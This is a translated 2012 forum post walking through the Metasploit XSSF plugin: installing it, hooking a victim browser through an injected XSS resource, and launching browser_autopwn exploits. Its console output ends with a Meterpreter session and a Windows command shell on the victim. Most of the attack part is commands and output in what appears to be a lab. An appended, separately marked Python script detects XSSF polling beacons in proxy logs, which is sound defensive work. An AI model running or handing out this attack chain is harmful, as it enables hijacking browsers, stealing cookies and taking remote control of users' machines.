Using the Metasploit XSSF attack plugin
Posted on 2012-8-6 15:58:48
# The latest version no longer supports it; please test with the MSF that ships in BT5 R1.
Installing xssf
    root@Dis9Team:~# cd /tmp
    root@Dis9Team:/tmp# wget xssf.googlecode.com/files/XSSF-2.1.tar
Copy it into the METASPLOIT directory
    root@Dis9Team:/tmp# mkdir 1
    root@Dis9Team:/tmp# mv XSSF-2.1.tar 1
    root@Dis9Team:/tmp# cd 1/
    root@Dis9Team:/tmp/1# tar xf XSSF-2.1.tar
    root@Dis9Team:/tmp/1# ls
    data  lib  modules  plugins  README_XSSF  XSSF-2.1.tar
    root@Dis9Team:/tmp/1# cp -rf * /pen/msf3/
    root@Dis9Team:/tmp/1# rm /pen/msf3/XSSF-2.1.tar
    root@Dis9Team:/tmp/1#
Then run msfupdate, otherwise the XSSF plugin will not be found.
Loading xssf

Start METASPLOIT and connect to the database

    msf > db_connect msf3:123456@127.0.0.1/msf3
    msf > load xssf

     __  __     ______     ______     ______
    /\_\_\_\   /\  ___\   /\  ___\   /\  ___\
    \/_/\_\/_  \ \___  \  \ \___  \  \ \  __\
      /\_\/\_\  \/\_____\  \/\_____\  \ \_\
      \/_/\/_/   \/_____/   \/_____/   \/_/     Cross-Site Scripting Framework
                                               Ludovic Courgnaud - CONIX Security

    [+] Server started : http://192.168.56.101:8888/

    [*] Please, inject 'http://192.168.56.101:8888/loop' resource in an XSS
    [*] Successfully loaded plugin: XSSF

If the IP shown is not your external IP, edit /opt/metasploit3/msf3/plugins/xssf.rb and replace 0.0.0.0 with your external IP.
Then make the target machine load "http://192.168.56.101:8888/loop" through the XSS.

Viewing XSS sessions

    msf > xssf_victims

    Victims
    =======

    id  xssf_server_id  active  ip            interval  browser_name       browser_version  cookie
    --  --------------  ------  --            --------  ------------       ---------------  ------
    1   1               true    192.168.56.1  2         Internet Explorer  6.0              YES

    [*] Use xssf_information [VictimID] to see more information about a victim

Connecting to the XSS session

    msf > xssf_information 1

    INFORMATION ABOUT VICTIM 1
    ============================
    IP ADDRESS      : 192.168.56.1
    ACTIVE          : TRUE
    FIRST REQUEST   : Tue Jul 19 23:30:25 UTC 2011
    LAST REQUEST    : Tue Jul 19 23:31:17 UTC 2011
    CONNECTION TIME : 52.0 seconds
    BROWSER NAME    : Internet Explorer
    BROWSER VERSION : 6.0
    OS NAME         : Windows
    OS VERSION      : XP
    ARCHITECTURE    : ARCH_X86
    LOCATION        : file:///C:/Documents and Settings/dis9team/妗棰/xss.htm
    COOKIES ?       : YES
    RUNNING ATTACK  : NONE
How to get system privileges: use the METASPLOIT module that automatically sets up a number of browser exploits. Note that its port must not be the same as the xssf plugin's port.
    msf > use auxiliary/server/browser_autopwn
    msf auxiliary(browser_autopwn) > show options

    Module options:

       Name        Current Setting  Required  Description
       ----        ---------------  --------  -----------
       LHOST                        yes       The IP address to use for reverse-connect payloads
       SRVHOST     0.0.0.0          yes       The local host to listen on.
       SRVPORT     8080             yes       The local port to listen on.
       SSL         false            no        Negotiate SSL for incoming connections
       SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
       URIPATH                      no        The URI to use for this exploit (default is random)

    msf auxiliary(browser_autopwn) > set LHOST 192.168.56.101
    LHOST => 192.168.56.101
    msf auxiliary(browser_autopwn) > set SRVHOST 192.168.56.101
    SRVHOST => 192.168.56.101
    msf auxiliary(browser_autopwn) > set SRVPORT 8081
    SRVPORT => 8081
    msf auxiliary(browser_autopwn) > exploit
    msf auxiliary(browser_autopwn) > exploit
    [*] Auxiliary module execution completed

    [*] Starting exploit modules on host 192.168.56.101...
    [*] ---

    [*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/QlQp2UFx8EADO
    [*] Server started.
    msf auxiliary(browser_autopwn) > [*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/pqDNRyLmHuA
    [*] Server started.
    [*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/kXVd9wNJ7
    [*] Server started.
    [*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/zNNqGn8p
    [*] Server started.
    [*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/nZqqJnbK17P2Uu
    [*] Server started.
    [*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/l45IFo
    [*] Server started.
    [*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/4uYjQ9Cd
    [*] Server started.
    [*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/jUnB2WdlVh
    [*] Server started.
    [*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/w3xxrTDcW1D
    [*] Server started.
    [*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/nf21OPGpG4
    [*] Server started.
    [*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/C7HBuD
    [*] Server started.
    [*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/GpI7DbKJ2wp5kS
    [*] Server started.
    [*] Starting exploit windows/browser/java_basicservice_impl with payload windows/meterpreter/reverse_tcp
    [-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
    [-] Failed to start exploit module windows/browser/java_basicservice_impl
    [*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/xFm6pSwb
    [*] Server started.
    [*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/yVJcsYOtv
    [*] Server started.
    [*] Starting exploit windows/browser/ms10_xxx_ie_css_clip with payload windows/meterpreter/reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/JaT9yvjsEik
    [*] Server started.
    [*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
    [*] Using URL: http://192.168.56.101:8081/1t4f8o9
    [*] Server started.
    [*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
    [*] Starting handler for generic/shell_reverse_tcp on port 6666
    [*] Started reverse handler on 192.168.56.101:3333
    [*] Starting handler for java/meterpreter/reverse_tcp on port 7777
    [*] Started reverse handler on 192.168.56.101:6666
    [*] Starting the payload handler...
    [*] Starting the payload handler...
    [*] Started reverse handler on 192.168.56.101:7777
    [*] Starting the payload handler...

    [*] --- Done, found 16 exploit modules

    [*] Using URL: http://192.168.56.101:8081/Xy5LvGuPst
    [*] Server started.

Viewing the exploits that are available
    msf auxiliary(browser_autopwn) > jobs

    Jobs
    ====

      Id  Name
      --  ----
      0   Auxiliary: server/browser_autopwn
      1   Exploit: multi/browser/firefox_escape_retval
      2   Exploit: multi/browser/java_calendar_deserialize
      3   Exploit: multi/browser/java_trusted_chain
      4   Exploit: multi/browser/mozilla_compareto
      5   Exploit: multi/browser/mozilla_navigatorjava
      6   Exploit: multi/browser/opera_configoverwrite
      7   Exploit: multi/browser/opera_historysearch
      8   Exploit: osx/browser/safari_metadata_archive
      9   Exploit: windows/browser/apple_quicktime_marshaled_punk
      10  Exploit: windows/browser/apple_quicktime_rtsp
      11  Exploit: windows/browser/apple_quicktime_smil_debug
      12  Exploit: windows/browser/ie_createobject
      13  Exploit: windows/browser/ms03_020_ie_objecttype
      14  Exploit: windows/browser/ms10_018_ie_behaviors
      15  Exploit: windows/browser/ms10_xxx_ie_css_clip
      16  Exploit: windows/browser/winzip_fileview
      17  Exploit: multi/handler
      18  Exploit: multi/handler
      19  Exploit: multi/handler

Choose the exploit module according to your target's operating system.

xssf_exploit 1 12: the first number is the XSS session, the second is the browser exploit number.
    msf auxiliary(browser_autopwn) > xssf_exploit 1 12
    [*] Searching Metasploit launched module with JobID = '12'...
    [+] A running exploit exists : 'Exploit: windows/browser/ie_createobject'
    [*] Exploit execution started, press [CTRL + C] to stop it !

    [*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:44018...

    [+] Code 'Exploit: windows/browser/ie_createobject' sent to victim '4'
    [+] Remaining victims to attack : NONE
    [*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:51709...
    [*] Sending EXE payload to 192.168.56.101:60903...
    [*] Sending stage (749056 bytes) to 192.168.56.1
    [*] Meterpreter session 1 opened (192.168.56.101:3333 -> 192.168.56.1:37151) at Tue Jul 19 23:42:03 -0400 2011
    [*] Session ID 1 (192.168.56.101:3333 -> 192.168.56.1:37151) processing InitialAutoRunScript 'migrate -f'
    [*] Current server process: njoFrATVcA.exe (1728)
    [*] Spawning a notepad.exe host process...
    [*] Migrating into process ID 1092
    [*] New server process: notepad.exe (1092)

    ^C[-] Exploit interrupted by the console user
    msf auxiliary(browser_autopwn) > sessions

    Active sessions
    ===============

      Id  Type                   Information                                 Connection
      --  ----                   -----------                                 ----------
      1   meterpreter x86/win32  DIS9TEAM-7A9CFB\dis9team @ DIS9TEAM-7A9CFB  192.168.56.101:3333 -> 192.168.56.1:37151

    msf auxiliary(browser_autopwn) > sessions -i 1
    [*] Starting interaction with 1...

    meterpreter > shell
    Process 5504 created.
    Channel 1 created.
    Microsoft Windows XP [版本 5.1.2600]
    (C) 版权所有 1985-2001 Microsoft Corp.

    C:\Documents and Settings\dis9team\桌面>
Done.
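Added example, not code from the original post or from XSSF: a browser that has loaded the injected "/loop" resource keeps polling the XSSF server at a fixed interval (the victim table above shows interval 2), so on the defender's side it appears in egress proxy logs as a regular beacon from one client to one URL. The script parses a constructed proxy log in an assumed "<ISO timestamp> <client ip> <method> <url>" format and flags client/URL pairs that are polled at a near-constant interval; the detection is generic to any such timed poller, not only XSSF.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample egress-proxy log (assumed format), one request per line:
# "<ISO-8601 timestamp> <client ip> <method> <url>"
SAMPLE_LOG = """\
2011-07-19T23:30:25 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:26 192.168.56.1 GET http://intranet.example/index.html
2011-07-19T23:30:27 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:29 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:30 192.168.56.2 GET http://intranet.example/index.html
2011-07-19T23:30:31 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:33 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:40 192.168.56.1 GET http://intranet.example/news.html
2011-07-19T23:31:10 192.168.56.1 GET http://intranet.example/logo.png
"""


def parse_log(text):
    """Yield (timestamp, client, url) for every well-formed line."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip blank or malformed lines instead of crashing
        ts, client, _method, url = parts
        yield datetime.fromisoformat(ts), client, url


def find_beacons(text, min_hits=4, max_jitter=0.25):
    """Return [(client, url, mean_gap_seconds)] for client/URL pairs requested
    at least min_hits times with a near-constant gap. Jitter is measured as the
    coefficient of variation of the gaps (population stdev / mean)."""
    hits = defaultdict(list)
    for ts, client, url in parse_log(text):
        hits[(client, url)].append(ts)
    beacons = []
    for (client, url), stamps in hits.items():
        if len(stamps) < min_hits:
            continue  # too few requests to call it a poll loop
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # all duplicate timestamps, not a timed poll
        if pstdev(gaps) / avg <= max_jitter:
            beacons.append((client, url, round(avg, 1)))
    return sorted(beacons)
```

Calling find_beacons(SAMPLE_LOG) reports only the 192.168.56.1 client polling the /loop URL every 2.0 seconds; the ordinary intranet browsing in the same log is not flagged.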
Posted on 2016-1-21 22:53:43
Just a lurker here. Not allowed to see it?
